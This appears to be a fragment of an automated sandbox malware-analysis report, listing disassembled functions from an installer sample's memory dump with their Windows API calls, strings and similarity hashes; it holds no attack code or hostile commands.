                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
                                                                • CloseHandle.KERNEL32(?), ref: 00405A30
                                                                Strings
                                                                • Error launching installer, xrefs: 00405A0D
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateHandleProcess
                                                                • String ID: Error launching installer
                                                                • API String ID: 3712363035-66219284
                                                                • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                • Instruction ID: 9b609aa4dbda1b40da6c9694c56aee9f908f129f2491f8ac19b90d9f5f8e4f4b
                                                                • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                • Instruction Fuzzy Hash: 19E0B6B4600209BFEB109FA4EE49F7B7AACEB04708F004565BD50F6191DBB8EC158A7C
                                                                Function 00405E6C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E94
                                                                • CharNextA.USER32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA5
                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                • String ID:
                                                                • API String ID: 190613189-0
                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                • Instruction ID: 346f7042b660fb70b52ae74c1c6e121eab6bc84344666f805f11c7930e864ff2
                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                • Instruction Fuzzy Hash: A8F06231505418FFD7029BA5DE0099FBBA8EF56250B2540AAE880F7250D674EF019BA9